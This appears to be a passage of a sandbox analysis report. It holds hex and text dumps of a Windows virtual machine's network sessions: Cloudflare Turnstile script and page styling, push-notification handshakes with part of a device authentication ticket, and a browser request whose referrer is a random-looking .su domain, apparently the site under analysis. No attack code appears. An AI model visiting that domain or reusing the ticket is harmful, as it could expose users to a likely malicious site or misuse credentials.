                                                          2024-01-24 14:33:57 UTC1369INData Raw: 29 7d 66 75 6e 63 74 69 6f 6e 20 47 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 47 3d 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 7c 7c 66 75 6e 63 74 69 6f 6e 28 6f 2c 66 29 7b 72 65 74 75 72 6e 20 6f 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 66 2c 6f 7d 2c 47 28 65 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 4f 74 28 65 2c 72 29 7b 69 66 28 74 79 70 65 6f 66 20 72 21 3d 22 66 75 6e 63 74 69 6f 6e 22 26 26 72 21 3d 3d 6e 75 6c 6c 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 53 75 70 65 72 20 65 78 70 72 65 73 73 69 6f 6e 20 6d 75 73 74 20 65 69 74 68 65 72 20 62 65 20 6e 75 6c 6c 20 6f 72 20 61 20 66 75 6e 63 74 69 6f 6e 22 29 3b 65 2e 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 72 26 26 72 2e 70 72 6f 74
                                                          Data Ascii: )}function G(e,r){return G=Object.setPrototypeOf||function(o,f){return o.__proto__=f,o},G(e,r)}function Ot(e,r){if(typeof r!="function"&&r!==null)throw new TypeError("Super expression must either be null or a function");e.prototype=Object.create(r&&r.prot
                                                          2024-01-24 14:33:57 UTC1369INData Raw: 75 6d 65 72 61 62 6c 65 3a 21 31 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 7d 29 2c 47 28 66 2c 6f 29 7d 2c 53 65 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 4e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 26 26 28 6b 28 72 29 3d 3d 3d 22 6f 62 6a 65 63 74 22 7c 7c 74 79 70 65 6f 66 20 72 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 3f 72 3a 77 65 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 6b 74 28 65 29 7b 76 61 72 20 72 3d 54 65 28 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 6f 3d 4a 28 65 29 2c 66 3b 69 66 28 72 29 7b 76 61 72 20 73 3d 4a 28 74 68 69 73 29 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3b 66 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 6f 2c 61 72 67 75 6d 65 6e 74 73 2c 73 29
                                                          Data Ascii: umerable:!1,writable:!0,configurable:!0}}),G(f,o)},Se(e)}function Nt(e,r){return r&&(k(r)==="object"||typeof r=="function")?r:we(e)}function kt(e){var r=Te();return function(){var o=J(e),f;if(r){var s=J(this).constructor;f=Reflect.construct(o,arguments,s)
                                                          2024-01-24 14:33:57 UTC1369INData Raw: 72 79 7b 66 6f 72 28 76 61 72 20 73 3d 65 2e 77 69 64 67 65 74 4d 61 70 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 28 29 2c 6d 3b 21 28 74 3d 28 6d 3d 73 2e 6e 65 78 74 28 29 29 2e 64 6f 6e 65 29 3b 74 3d 21 30 29 7b 76 61 72 20 70 3d 68 65 28 6d 2e 76 61 6c 75 65 2c 32 29 2c 67 3d 70 5b 30 5d 2c 75 3d 70 5b 31 5d 2c 78 3b 75 2e 77 61 74 63 68 63 61 74 2e 73 65 71 3d 65 2e 77 61 74 63 68 43 61 74 53 65 71 2c 75 2e 77 61 74 63 68 63 61 74 2e 6c 61 73 74 41 63 6b 65 64 53 65 71 3d 3d 3d 30 26 26 28 75 2e 77 61 74 63 68 63 61 74 2e 6c 61 73 74 41 63 6b 65 64 53 65 71 3d 65 2e 77 61 74 63 68 43 61 74 53 65 71 29 3b 76 61 72 20 77 3d 58 28 67 29 3b 69 66 28 21 77 29 7b 75 2e 77 61 74 63 68 63 61 74 2e 6d 69 73 73 69 6e 67 57 69 64 67 65 74 57 61 72 6e
                                                          Data Ascii: ry{for(var s=e.widgetMap[Symbol.iterator](),m;!(t=(m=s.next()).done);t=!0){var p=he(m.value,2),g=p[0],u=p[1],x;u.watchcat.seq=e.watchCatSeq,u.watchcat.lastAckedSeq===0&&(u.watchcat.lastAckedSeq=e.watchCatSeq);var w=X(g);if(!w){u.watchcat.missingWidgetWarn
                                                          2024-01-24 14:33:57 UTC1369INData Raw: 74 69 6f 6e 20 51 65 28 65 2c 72 29 7b 65 2e 77 61 74 63 68 43 61 74 49 6e 74 65 72 76 61 6c 3d 3d 3d 6e 75 6c 6c 26 26 28 65 2e 77 61 74 63 68 43 61 74 49 6e 74 65 72 76 61 6c 3d 73 65 74 49 6e 74 65 72 76 61 6c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 28 65 2c 72 29 7d 2c 5a 74 29 29 7d 66 75 6e 63 74 69 6f 6e 20 24 65 28 65 29 7b 76 61 72 20 72 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 26 26 61 72 67 75 6d 65 6e 74 73 5b 31 5d 21 3d 3d 76 6f 69 64 20 30 3f 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3a 21 31 3b 65 2e 77 61 74 63 68 43 61 74 49 6e 74 65 72 76 61 6c 21 3d 3d 6e 75 6c 6c 26 26 28 65 2e 77 69 64 67 65 74 4d 61 70 2e 73 69 7a 65 3d 3d 3d 30 7c 7c 72 29 26 26 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 28 65 2e 77 61 74 63 68 43 61 74 49
                                                          Data Ascii: tion Qe(e,r){e.watchCatInterval===null&&(e.watchCatInterval=setInterval(function(){tr(e,r)},Zt))}function $e(e){var r=arguments.length>1&&arguments[1]!==void 0?arguments[1]:!1;e.watchCatInterval!==null&&(e.widgetMap.size===0||r)&&clearInterval(e.watchCatI
                                                          2024-01-24 14:33:57 UTC1369INData Raw: 65 6e 74 4e 6f 64 65 29 3d 3d 3d 6e 75 6c 6c 7c 7c 74 3d 3d 3d 76 6f 69 64 20 30 7c 7c 74 2e 72 65 70 6c 61 63 65 43 68 69 6c 64 28 6d 2c 6f 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 44 74 28 65 2c 72 29 7b 76 61 72 20 74 3d 65 2e 5f 70 53 74 61 74 65 3b 72 65 74 75 72 6e 20 74 3f 28 72 2e 69 73 52 65 61 64 79 3d 74 2e 69 73 52 65 61 64 79 2c 72 2e 69 73 52 65 63 61 70 74 63 68 61 43 6f 6d 70 61 74 69 62 69 6c 69 74 79 4d 6f 64 65 3d 74 2e 69 73 52 65 63 61 70 74 63 68 61 43 6f 6d 70 61 74 69 62 69 6c 69 74 79 4d 6f 64 65 2c 72 2e 6c 61 73 74 57 69 64 67 65 74 49 64 78 3d 74 2e 6c 61 73 74 57 69 64 67 65 74 49 64 78 2c 72 2e 73 63 72 69 70 74 57 61 73 4c 6f 61 64 65 64 41 73 79 6e 63 3d 74 2e 73 63 72 69 70 74 57 61 73 4c 6f 61 64 65 64 41 73 79 6e 63 2c 72 2e
                                                          Data Ascii: entNode)===null||t===void 0||t.replaceChild(m,o)}}function Dt(e,r){var t=e._pState;return t?(r.isReady=t.isReady,r.isRecaptchaCompatibilityMode=t.isRecaptchaCompatibilityMode,r.lastWidgetIdx=t.lastWidgetIdx,r.scriptWasLoadedAsync=t.scriptWasLoadedAsync,r.
                                                          2024-01-24 14:33:57 UTC1369INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 29 7b 69 66 28 74 79 70 65 6f 66 20 65 21 3d 22 73 74 72 69 6e 67 22 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 64 6a 62 32 3a 20 65 78 70 65 63 74 65 64 20 73 74 72 69 6e 67 2c 20 67 6f 74 20 22 2e 63 6f 6e 63 61 74 28 74 79 70 65 6f 66 20 65 3d 3d 22 75 6e 64 65 66 69 6e 65 64 22 3f 22 75 6e 64 65 66 69 6e 65 64 22 3a 6b 28 65 29 29 29 3b 66 6f 72 28 76 61 72 20 72 3d 35 33 38 31 2c 74 3d 30 3b 74 3c 65 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 7b 76 61 72 20 6f 3d 65 2e 63 68 61 72 43 6f 64 65 41 74 28 74 29 3b 72 3d 72 2a 33 33 5e 6f 7d 72 65 74 75 72 6e 20 72 3e 3e 3e 30 7d 76 61 72 20 61 65 3d 21 31 2c 79 3d 7b 74 75 72 6e 73 74 69 6c 65 4c 6f 61 64 49 6e 69 74 54 69 6d 65 3a 2b 6e 65 77 20 44 61 74 65
                                                          Data Ascii: }function Wt(e){if(typeof e!="string")throw new Error("djb2: expected string, got ".concat(typeof e=="undefined"?"undefined":k(e)));for(var r=5381,t=0;t<e.length;t++){var o=e.charCodeAt(t);r=r*33^o}return r>>>0}var ae=!1,y={turnstileLoadInitTime:+new Date


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          6192.168.2.64972720.25.241.18443
                                                          TimestampBytes transferredDirectionData
                                                          2024-01-24 14:33:57 UTC70OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 34 0d 0a 4d 53 2d 43 56 3a 20 4d 72 4a 43 59 4a 7a 78 6e 55 79 42 76 77 2b 4d 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 33 63 35 63 30 37 32 61 35 30 30 61 66 36 0d 0a 0d 0a
                                                          Data Ascii: CNT 1 CON 304MS-CV: MrJCYJzxnUyBvw+M.1Context: e3c5c072a500af6
                                                          2024-01-24 14:33:57 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                          Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                          2024-01-24 14:33:57 UTC1063OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 30 0d 0a 4d 53 2d 43 56 3a 20 4d 72 4a 43 59 4a 7a 78 6e 55 79 42 76 77 2b 4d 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 33 63 35 63 30 37 32 61 35 30 30 61 66 36 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 52 77 2b 31 66 33 69 61 34 31 7a 5a 2b 77 76 46 41 79 4c 6a 79 4a 4f 35 78 62 41 42 68 6e 53 35 76 63 2f 63 50 34 66 65 41 6f 6c 56 30 51 4e 33 4a 6d 36 57 4e 72 67 4f 55 68 2f 76 6b 32 6c 34 42 67 2b 31 68 66 65 76 67 39 4b 67 31 59 53 55 5a 62 30 41 48 4c 79 53 39 58 33 6e 71 77 37 45 55 67 38 4e 78 67 62 61 6f 56 6a 6d 77 34
                                                          Data Ascii: ATH 2 CON\DEVICE 1040MS-CV: MrJCYJzxnUyBvw+M.2Context: e3c5c072a500af6<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAARw+1f3ia41zZ+wvFAyLjyJO5xbABhnS5vc/cP4feAolV0QN3Jm6WNrgOUh/vk2l4Bg+1hfevg9Kg1YSUZb0AHLyS9X3nqw7EUg8NxgbaoVjmw4
                                                          2024-01-24 14:33:57 UTC217OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 36 0d 0a 4d 53 2d 43 56 3a 20 4d 72 4a 43 59 4a 7a 78 6e 55 79 42 76 77 2b 4d 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 33 63 35 63 30 37 32 61 35 30 30 61 66 36 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                          Data Ascii: BND 3 CON\WNS 0 196MS-CV: MrJCYJzxnUyBvw+M.3Context: e3c5c072a500af6<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                          2024-01-24 14:33:57 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                          Data Ascii: 202 1 CON 58
                                                          2024-01-24 14:33:57 UTC58INData Raw: 4d 53 2d 43 56 3a 20 70 70 73 31 4d 6e 61 68 6a 55 75 34 75 73 47 58 30 4e 36 66 56 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                          Data Ascii: MS-CV: pps1MnahjUu4usGX0N6fVA.0Payload parsing failed.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          7192.168.2.649728184.31.50.93443
                                                          TimestampBytes transferredDirectionData
                                                          2024-01-24 14:33:57 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept: */*
                                                          Accept-Encoding: identity
                                                          User-Agent: Microsoft BITS/7.8
                                                          Host: fs.microsoft.com
                                                          2024-01-24 14:33:58 UTC532INHTTP/1.1 200 OK
                                                          Content-Type: application/octet-stream
                                                          Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                          ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                          X-Ms-ApiVersion: Distribute 1.2
                                                          X-Ms-Region: prod-eus2-z1
                                                          Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                          X-MSEdge-Ref: Ref A: 760E6E4DEEFC470295C21678AF5AB3D4 Ref B: ASHEDGE1507 Ref C: 2024-01-22T03:17:52Z
                                                          Cache-Control: public, max-age=45831
                                                          Date: Wed, 24 Jan 2024 14:33:57 GMT
                                                          Connection: close
                                                          X-CID: 2


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          8192.168.2.649729104.17.2.1844432104C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-01-24 14:33:58 UTC807OUTGET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/nbltc/0x4AAAAAAAQcAKAiG1Sgzcix/auto/normal HTTP/1.1
                                                          Host: challenges.cloudflare.com
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          sec-ch-ua-platform: "Windows"
                                                          Upgrade-Insecure-Requests: 1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Sec-Fetch-Site: cross-site
                                                          Sec-Fetch-Mode: navigate
                                                          Sec-Fetch-Dest: iframe
                                                          Referer: https://iajjfhkbqnkrnryejn.ypiqzxx7wocs.su/
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          2024-01-24 14:33:58 UTC1211INHTTP/1.1 200 OK
                                                          Date: Wed, 24 Jan 2024 14:33:58 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                          content-security-policy: frame-src https://challenges.cloudflare.com/ blob:; base-uri 'self'
                                                          cross-origin-embedder-policy: require-corp
                                                          cross-origin-opener-policy: same-origin
                                                          cross-origin-resource-policy: cross-origin
                                                          document-policy: js-profiling
                                                          origin-agent-cluster: ?1
                                                          permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                          referrer-policy: same-origin
                                                          Server: cloudflare
                                                          CF-RAY: 84a8fe9b2b47507e-ATL
                                                          alt-svc: h3=":443"; ma=86400
                                                          2024-01-24 14:33:58 UTC158INData Raw: 37 61 66 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20
                                                          Data Ascii: 7af4<!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex,
                                                          2024-01-24 14:33:58 UTC1369INData Raw: 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 63 68 61 6c 6c 65 6e 67 65 2d 70 6c 61 74 66 6f 72 6d 2f 68 2f 67 2f 63 6d 67 2f 31 2f 77 68 30 45 30 53 58 59 6e 78 36 70 54 42 64 4a 57 25 32 46 6c 39 32 36 49 25 32 42 50 52 55 70 6c 52 64 74 51 7a 33 4b 39 6c 48 58 73 25 32 46 73 25 33 44 22 20 61 73 3d 22 69 6d 61 67 65 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 43 68 65 63 6b 69 6e
                                                          Data Ascii: nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"> <link rel="preload" href="/cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D" as="image"> <title>Checkin
                                                          2024-01-24 14:33:58 UTC1369INData Raw: 74 65 6d 2d 75 69 2c 20 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 72 6f 62 6f 74 6f 2c 20 6f 78 79 67 65 6e 2c 20 75 62 75 6e 74 75 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 20 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 20 61 6e 74 69 61 6c 69 61 73 65 64 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 7d 0a 0a 68 31 20 7b 0a 20 20 6d 61 72 67 69 6e 3a 20 31 36 70 78 20 30 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 6c 69 6e 65
                                                          Data Ascii: tem-ui, blinkmacsystemfont, "Segoe UI", roboto, oxygen, ubuntu, "Helvetica Neue", arial, sans-serif; font-size: 14px; font-weight: 400; -webkit-font-smoothing: antialiased; font-style: normal;}h1 { margin: 16px 0; text-align: center; line
                                                          2024-01-24 14:33:58 UTC1369INData Raw: 30 2e 35 33 29 20 62 6f 74 68 3b 0a 20 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 20 36 70 78 3b 0a 20 20 73 74 72 6f 6b 65 3a 20 23 66 38 66 38 66 38 3b 0a 20 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 20 31 30 3b 0a 7d 0a 23 73 75 63 63 65 73 73 2d 69 63 6f 6e 20 2e 70 31 20 7b 0a 20 20 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 20 32 34 32 3b 0a 20 20 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 20 32 34 32 3b 0a 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 69 6e 73 65 74 20 30 20 30 20 30 20 23 30 33 38 31 32 37 3b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 74 72 6f 6b 65 20 30 2e 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 36 35 2c 20 30 2c 20 30 2e 34 35 2c 20 31 29 20 66 6f 72 77 61 72 64 73 3b 0a 20 20 61 6e
                                                          Data Ascii: 0.53) both; stroke-width: 6px; stroke: #f8f8f8; stroke-miterlimit: 10;}#success-icon .p1 { stroke-dasharray: 242; stroke-dashoffset: 242; box-shadow: inset 0 0 0 #038127; animation: stroke 0.4s cubic-bezier(0.65, 0, 0.45, 1) forwards; an
                                                          2024-01-24 14:33:58 UTC1369INData Raw: 3b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 32 32 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 63 74 70 2d 63 68 65 63 6b 62 6f 78 2d 6c 61 62 65 6c 20 69 6e 70 75 74 3a 66 6f 63 75 73 20 7e 20 2e 6d 61 72 6b 2c 20 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 63 74 70 2d 63 68 65 63 6b 62 6f 78 2d 6c 61 62 65 6c 20 69 6e 70 75 74 3a 61 63 74 69 76 65 20 7e 20 2e 6d 61 72 6b 20 7b 0a 20 20 62 6f 72 64 65 72 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 66 62 61 64 34 31 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 63 74 70 2d 63 68 65 63 6b 62 6f 78 2d 6c 61 62 65 6c 20 69 6e 70 75 74 3a 63 68 65 63 6b 65 64 20 7e 20 2e 6d 61 72 6b 20 7b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 36 64 36 64 36 64 3b 0a 7d
                                                          Data Ascii: ; background-color: #222;}.theme-dark .ctp-checkbox-label input:focus ~ .mark, .theme-dark .ctp-checkbox-label input:active ~ .mark { border: 2px solid #fbad41;}.theme-dark .ctp-checkbox-label input:checked ~ .mark { background-color: #6d6d6d;}
                                                          2024-01-24 14:33:58 UTC1369INData Raw: 69 6e 6b 2c 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 62 62 62 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 2c 20 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 2c 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 62 62 62 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 69 6e 6b 3a
                                                          Data Ascii: ink,.theme-dark #fr-helper-loop-link { color: #bbb;}.theme-dark #fr-helper-link:visited, .theme-dark #fr-helper-link:link,.theme-dark #fr-helper-loop-link:visited,.theme-dark #fr-helper-loop-link:link { color: #bbb;}.theme-dark #fr-helper-link:
                                                          2024-01-24 14:33:58 UTC1369INData Raw: 6f 76 65 72 2c 20 23 63 68 61 6c 6c 65 6e 67 65 2d 6f 76 65 72 6c 61 79 20 61 3a 66 6f 63 75 73 2c 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 61 63 74 69 76 65 2c 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 68 6f 76 65 72 2c 0a 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 20 61 3a 66 6f 63 75 73 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 31 36 36 33 37 39 3b 0a 7d 0a 0a 23 6c 6f 67 6f 20 7b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 3b 0a 20 20 68 65 69 67 68 74 3a 20 32 36 70 78 3b 0a 7d 0a 0a 2e 66 61 69 6c 75 72 65 2d 63 69 72 63 6c 65 20 7b 0a 20 20 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 20 31 36 36 3b 0a 20 20 73 74 72 6f 6b 65 2d 64 61 73 68
                                                          Data Ascii: over, #challenge-overlay a:focus,#challenge-error-text a:active,#challenge-error-text a:hover,#challenge-error-text a:focus { color: #166379;}#logo { margin-bottom: 1px; height: 26px;}.failure-circle { stroke-dasharray: 166; stroke-dash
